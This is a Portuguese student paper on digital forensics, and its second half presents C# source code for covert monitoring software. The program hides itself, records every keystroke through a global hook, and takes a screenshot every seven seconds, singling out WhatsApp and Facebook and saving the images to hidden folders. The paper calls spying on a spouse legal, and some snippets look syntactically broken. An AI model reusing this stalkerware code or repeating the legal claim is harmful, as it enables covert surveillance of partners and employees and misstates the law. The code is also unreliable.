Investigação Digital

1. Resumo

No seguinte trabalho será desenvolvido um breve resumo de uma das áreas mais promissoras das investigações em geral, a investigação digital, já que nossas vidas de certa forma estão se tornando mais dependentes de informações virtuais, cada vez mais cresce o numero de profissionais nessa área, de forma congruente se multiplica o numero de ferramentas que tem como objetivo ajudar o profissional, uma dessas ferramentas inclusive será exemplificada, o software espião que auxilia na analise de dados de uma maquina especifica.

Palavras chave: Software espião, Investigação Digital e Computação Forense.

Abstract

In the following work will be developed a brief summary of one of the most promising areas of research in general, digital research, as our lives are somehow becoming more dependent on virtual information, more and more the number of professionals in this area, consistently multiply the number of tools that aims to help the professional, one of these tools will even be exemplified, the spy software that assists in the analysis of data of a specific machine.

Keywords: Spy Software, Digital Research and Forensic Computing.

2. Introdução

Trabalho que será desenvolvido a seguir tem como objetivo apresentar algumas noções básicas de investigação digital dando um resumo de algumas áreas legais em que ela pode ser aplicada, investigação digital sendo o uso dos conhecimentos na área de T.I sendo direcionada a coleta e analise de informações para conhecer um individuo alvo. Áreas como investigação particular serão abordadas juntamente com uma ferramenta especifica que auxilia o caso de diversos investigadores, softwares espiões que grava e transmite informações de uma maquina a uma cliente, dentro, sempre, dos conformes legais.

3. Computação Forense

A Computação Forense consiste, basicamente, no uso de métodos científicos para preservação, coleta, validação, identificação, análise, interpretação, documentação e apresentação de evidência digital com validade probatória em juízo. Crimes cibernéticos como fraudes bancárias e roubo de identidade são alguns dos exemplos dos crimes em que é requisitado um profissional nessa área, em resumo qualquer crime que envolva, direta ou indiretamente aparelhos que armazenam dados, como computadores ou celulares.

A aplicação desses métodos nem sempre se dá de maneira simples, uma vez que encontrar uma evidência digital em um computador pode ser uma tarefa muito árdua. Atualmente, com os discos rígidos atingindo a capacidade de TeraBytes de armazenamento, milhões de arquivos podem ser armazenados.

3.1. O profissional

Dentro do âmbito criminal, cabe ao perito criminal a tarefa de analisar os materiais digitais em busca das provas. Tal profissional, especialista em Computação, irá aplicar métodos e técnicas cientificamente comprovadas em busca de evidências digitais, levando-as, através do laudo pericial, até o julgamento. O perito criminal deve sempre se atentar para a correta preservação da prova.

3.2. Computação Forense X Informática Forense

Breve comparação entre duas áreas que apesar de muito próximas ainda se distinguem, cada qual com suas individualidades.

3.2.1. Computação Forense

• Inspeção científica e sistemática em ambientes computacionais com a finalidade de angariar evidências digitais para que seja possível a reconstituição dos eventos.

• Investigação dos dispositivos de armazenamento e de processamento de dados (computadores, portáteis, servidores, etc) e meios de armazenamento removíveis (CD, disquetes, pendrives, etc) para determinar se foi utilizado para atividades ilegais, não autorizadas ou irregulares.

3.2.2. Informática Forense:

• É a ciência da investigação dos processos que geram informação.

• Processos automáticos utilizam de forma generalizada as tecnologias informáticas e de comunicações para capturar, processar, armazenar e transmitir dados.

• Processos manuais complementam os sistemas em todos os níveis de processos. Exemplo: entrada de dados, verificação de cálculos, relatórios, etc

3.3. Definições de crime digital

Os Crimes Digitais, conhecidos como Crimes Cibernéticos ou Crimes de Alta Tecnologia, representam as condutas criminosas cometidas com o uso das tecnologias de informação e comunicação, e também os crimes nos quais o objeto da ação criminosa é o próprio sistema informático.

Os crimes são previstos pelo Código Penal, mas que, quando cometidos por meio da Internet causam danos muito maiores.

4. Processo de Investigação Digital

O processo se divide basicamente em quatro etapas, coleta dos dados, exame dos dados, análise das informações e interpretação dos resultados.

4.1. 2.1 – Coletas de dados

Consiste em identificar as possíveis fontes de dados, como computadores pessoais, laptops, celulares ou armazenamento externo como servidores FTP e servidores de E-mail, e logo após a analise das fontes partir para a coleta de dados na qual deve ser priorizada a preservação dos dados.

4.2. 2.2 – Exames dos dados

Tem como finalidade analisar e extrair informações relevantes à investigação, filtrando as informações mais importantes e assim obter evidencia.

4.3. Análises das informações

Momento de analisar as informações depende da experiência e do conhecimento do perito, pois em geral não existem ferramentas para isso. Demanda muito tempo.

4.4. Interpretações dos resultados

Laudo que deve apresentar uma conclusão imparcial em final sobre a investigação baseada em todos os itens obtidos através dela.

5. Software Espião

Quando se tem um primeiro contato com o conceito de Software espião é comum ter como uma conclusão precipitada de que é a mais pura invasão de privacidade, podendo ser considerada ilegal. Porem na verdade é um simples captor de informação, dentro dos parâmetros legais que tem como principal objetivo manter a ordem dentro de um ambiente de trabalho e, em alguns casos, salvar vidas (Fato que será explicado ao longo do capitulo).

5.1. Funcionamento

O software em questão tem como através de algumas ferramentas pré-programadas, salvar informações e transmiti-las a um cliente.

5.1.1. KeyLogger

KeyLogger é uma ferramenta feita para capturar quais as teclas digitadas em um computador, podendo ser programadas para salvar em um intervalo de tempo pré-determinado ou quando um determinada tecla é digitada (A tecla ‘Enter’ por exemplo) . Com esse software é possível descobrir senhas e atividades do usuário.

5.1.2. Screenshot Keylogger

Através de bibliotecas especificas tira fotos da tela do computador. Permitindo o administrador ter uma visão geral e rápida de tudo o que o usuário fez no computador o dia todo armazenando as imagens de forma oculta Podendo assim ter uma prova física das ações do usuário.

5.1.3. Url History

Programa capaz de salvar a Url dos sites acessados no navegador padrão. Podendo assim ter ideia das atividades online. Exibi também informações como data e horário do acesso, título da pagina e nome do usuário da maquina no momento do acesso.

5.2. Aplicações

Como citado anteriormente o software não é necessariamente ilegal, na verdade a principal diferença entre um software espião e um Spyware comum é que no Software o proprietário da maquina tem consciência da existência da existência do mesmo na maquina.

5.2.1. Uso empresarial

Sendo os computares de uma empresa pertencente as mesma, seus donos tem total direito de instalar um software que monitore as atividades do funcionário utilizando bem físico da empresa, mesmo que seja recomendado que o funcionário seja alertado do uso do software, pois evita conflitos e ajudaria a aumentar a confiança do mesmo na empresa em que ele trabalha.

5.2.2. Uso residencial

Os dois principais usos desse tipo de programa em residências são a espionagem do cônjuge, em caso de possível infidelidade, ou para monitorar as atividades dos filhos, sendo que esse ultimo um uso recomendado já que não são raros os casos em que o uso desse tipo de software impediu as ações de pedófilos e sequestradores que se comunicavam como crianças. Como em ambos os casos o computador é propriedade do cliente o uso do software é permitido por lei.

5.2.3. Vantagens x Desvantagens

5.2.4. Vantagens

O objetivo primário desse tipo software é o monitoramento de uma maquina que seja propriedade daquele que o instala, até por isso eles somente podem ser instalados de forma física, quando se tem contato com a maquina. Desta forma ele se torna apenas uma forma de controle do que está sendo acessado na maquina.

5.2.5. Desvantagens

Ainda que na definição desse software esteja claramente dito que usa-lo sem o consentimento do proprietário da maquina é ilegal, ainda pode ser usado para espionagem e coleta não permitida de dados, ou seja, invasão de privacidade.

6. Aplicação

6.1. Conceito

A aplicação foi feita sobre duas bases, um programa simples, porém eficiente, desta forma seria evitado uma programação complexa e sujeita a erros igualmente complexos que poderiam ser substituídas por uma programação simples e que atenda o mesmo objetivo. Desta forma, por exemplo, não foi usado nenhuma banco de dados, as informações são salvas diretamente na maquina, em pastas ocultas e que são chamadas quando o usuário necessita.

6.2. Funcionamento

6.2.1. Invisível

O programa se mantem escondido com o comando:

this.WindowState = FormWindowState.Minimized;

this.ShowInTaskbar = false;

Que fica no frmAcesso, que é o primeiro a ser acessado. Ele então fica escondido até que as teclas ctrl + alt + C, que faz com que esse form se torne visível, ação que é possível através da seguinte programação:

using HookEx;

public partial class frmAcesso : Form

{

UserActivityHook hook;

/ *se refere a uma biblioteca chamada UserActivityHook que capta atividades realizadas mesmo quando o programa esta em segundo plano, além desta, está sendo usado outra biblioteca cujo nome é EventSet, que é execencial para o funcionamento da primeira citada */

string log = string.Empty;

int Teste = 0;

string Password = "";

int countTimer = 0;

public frmAcesso()

{

InitializeComponent();

textBox1.Focus();

this.WindowState = FormWindowState.Minimized;

this.ShowInTaskbar = false;

hook = new UserActivityHook();

hook.KeyUp += (s, e) =>

{

string filter = e.KeyData.ToString(); //filter é o titulo da tecla

else if (filter == "RControlKey") { filter = "{Ctrl}"}

else if (filter == "LControlKey") {filter = "{Ctrl}"}

else if (filter == "LMenu") {filter = "{Alt}"}

else if (filter == "Return"){filter = "\r\n"}

if (filter == "C")

{

Teste = 1;

Password = "";

}

log += filter;

Password += filter;

textBox2.Text = log; //textbox2 fica invisivel durante toda a aplicação, mas é nela que é salvo as teclas digitadas

if (Teste == 1)

{

if (Password == "C{Alt}{Ctrl}")

{

this.WindowState = FormWindowState.Normal;

this.ShowInTaskbar = true;

}

}

};

}

}

4.2.2 – Prints

Assim que o programa é iniciado dois outros forms são ativados em modo oculto, o frmTelas e o frmPrincipal, o frmTelas, como tem como objetivo tirar prints das telas atuais a cada sete segundos, faz isso atravês de três timers com programações que se difere unicamente no local onde é salva o print, segundo a tela em que se encontra. Quando a tela em foco é o Whastapp Web é salvo em um lugar especifico, quando é o Facebook em outro e em qualquer outra tela é salva em uma especifica.

A identificação da tela atual se da pela por um código que lê o titulo da tela atual:

[DllImport("user32.dll")]

public static extern IntPtr GetForegroundWindow();

[DllImport("user32.dll")]

public static extern int GetWindowText(IntPtr hWnd, StringBuilder txt, int count);

public void getWindowTitle()

{

if (previousWindow == getActiveWindowName()){}

else

{

link.Text += getActiveWindowName() + "\r\n";

previousWindow = getActiveWindowName();

}

}

private string getActiveWindowName()

{

const int nChar = 256;

IntPtr handle = IntPtr.Zero;

StringBuilder Buff = new StringBuilder(nChar);

handle = GetForegroundWindow();

if (GetWindowText(handle, Buff, nChar) > 0) {return Buff.ToString()}

return null;

}

private void Timer_Tick(object sender, EventArgs e) {getWindowTitle()}

Como essa programação em funcionamento os timers podem então cumprir o seu papel.

int counter = 0;

private void timer1_Tick(object sender, EventArgs e)

{

if ((getActiveWindowName() != "WhatsApp - Google Chrome") & ( getActiveWindowName() != "Facebook - Google Chrome"))

{

counter = counter + 1;

Rec = new Rectangle();

Rec = Screen.GetBounds(Rec);

String[] imgs = new String[counter];

string a = counter.ToString();

Convert.ToString(counter);

Bitmap Foto = new Bitmap(Rec.Width, Rec.Height, System.Drawing.Imaging.PixelFormat.Format32bppArgb);

Graf = Graphics.FromImage(Foto);

Graf.CopyFromScreen(Rec.X, Rec.Y, 0, 0, Rec.Size, CopyPixelOperation.SourceCopy);

Try {Foto.Save("F:/Horus/prints/myimg" + Convert.ToString(counter) + ".jpg")}

catch{}

}

else{}

}

A programação acima somente se difere nos tres timers pelo If que identifica a tela atual e pelo local e nome que o arquivo é salvo, desta forma

if ((getActiveWindowName() != "WhatsApp - Google Chrome") & (getActiveWindowName() != "Facebook - Google Chrome"))

e

Foto.Save("F:/Horus/prints/myimg" + Convert.ToString(counter) + ".jpg");

Se tornão

if (getActiveWindowName() == "WhatsApp - Google Chrome")

e

Foto.Save("F:/Horus/wprints/wmyimg" + Convert.ToString(wcounter) + ".jpg");

Ou

if (getActiveWindowName() == "Facebook - Google Chrome")

e

Foto.Save("F:/Horus/fprints/fmyimg" + Convert.ToString(wcounter) + ".jpg");

Com a programação salvando os prints em pastas ocultas cabe ao formPrincipal exibir as imagens para o usuario em três paineis diferentes(um pra cada tipo de print) que ficam invisiveis ate que seus respectivos botoes são apertados, os paines exibem as imagens atraves da seguinte programação

public void Aparece(object sender, EventArgs e)

{

var snd = (PictureBox)sender;

pictureBox1.Image = snd.Image;

}

private void timer1_Tick(object sender, EventArgs e)

{

panel1.Controls.Clear();

String MEN = "F:/Horus/prints/";

String[] fil = System.IO.Directory.GetFiles(MEN);

int quantimages = fil.Length;

String[] imgs = new String[quantimages];

for (int j = 1; j <= quantimages; j++) {imgs[j - 1] = MEN + "myimg" + j.ToString() + ".jpg"}

PictureBox[] a = new PictureBox[quantimages];

int count = 0, pos = 35;

for (int i = 0; i < imgs.Length; i++)

{

a[i] = new PictureBox();

a[i].Image = Image.FromFile(imgs[i]);

a[i].Location = new Point(35, pos);

a[i].SizeMode = PictureBoxSizeMode.StretchImage;

a[i].Width = a[i].Image.Width / 10;

a[i].Height = a[i].Image.Height / 10;

a[i].Padding = new Padding(2, 2, 2, 2);

a[i].Click += Aparece;

a[i].BackColor = Color.Red;

panel1.Controls.Add(a[i]);

pos += a[i].Image.Height / 10 + 10;

count++;

}

}

Assim como no frmTelas existem três timers que se diferem apenas pelo caminho que as imagens estão salvas

7. Considerações Finais

Com base em tudo que foi abordado ao longo do trabalho é fácil chegar a conclusão de que o mundo digital abre portas para diversos perigos e crimes, e cabe a profissionais capacitados que resolvam essas mesmas transgressões a ordem, e para isso devem usar as ferramentas certas, sendo importante sempre a evolução dessas mesmas ferramentas na mão de desenvolvedores, para que não se tornem obsoletas.

Um novo mundo surgiu e aos poucos nós entramos dentro nele, a tecnologia se mostrou como sendo parte natural da evolução, mas é inadmissível que pessoas más intencionadas usem-na para praticar atos repugnantes, a justiça deve ser feita e para isso é necessário uma boa investigação para que se obtenham provas que farão com que os culpados paguem por seus crimes e que a internet fique, mesmo que em passos curtos, um pouco mais segura.

8. Referências bibliográficas

BRASIL, Lei n. 2.848, de 07 de dezembro 1940. Código Penal. Disponível em: www.planalto.gov.br/ccivil_03/decreto-lei/del2848.htm. (acesso em 05/06/2018)

canaltech.com.br/seguranca/O-que-e-keylogger/ (acessado em 05/06/2018)

Neukamp, Paulo A. Forense Computacional: Fundamentos e Desafios Atuais. 11 Junho de 2007. Universidade do Vale do Rio dos Sinos (UNISINOS). 06 Nov. 2007

programaespiaoparacelular.com (acessado em 05/06/2018)

RODRIGUES, Jacson. Investigação Digital. Espirito Santo: Universidade Federal do Espírito Santo Centro de Ciências Agrárias – CCA UFWA Departamento de Computação. Disponível em: jeiks.net(acessado em 05/06/2001)

security.winmonitor.com.br(acessado em 05/06/2018)

wikipedia.org/wiki/Computa%C3%A7%C3%A3o_forense(site acessado em 03/06/2018)

www.baguete.com.br/colunas/ramiro-martini/16/05/2016/computacao-forense-o-que-e-e-como-funciona(acessado em 05/06/2018)

www.saudebeleza.org(acesso em 05/09/2010)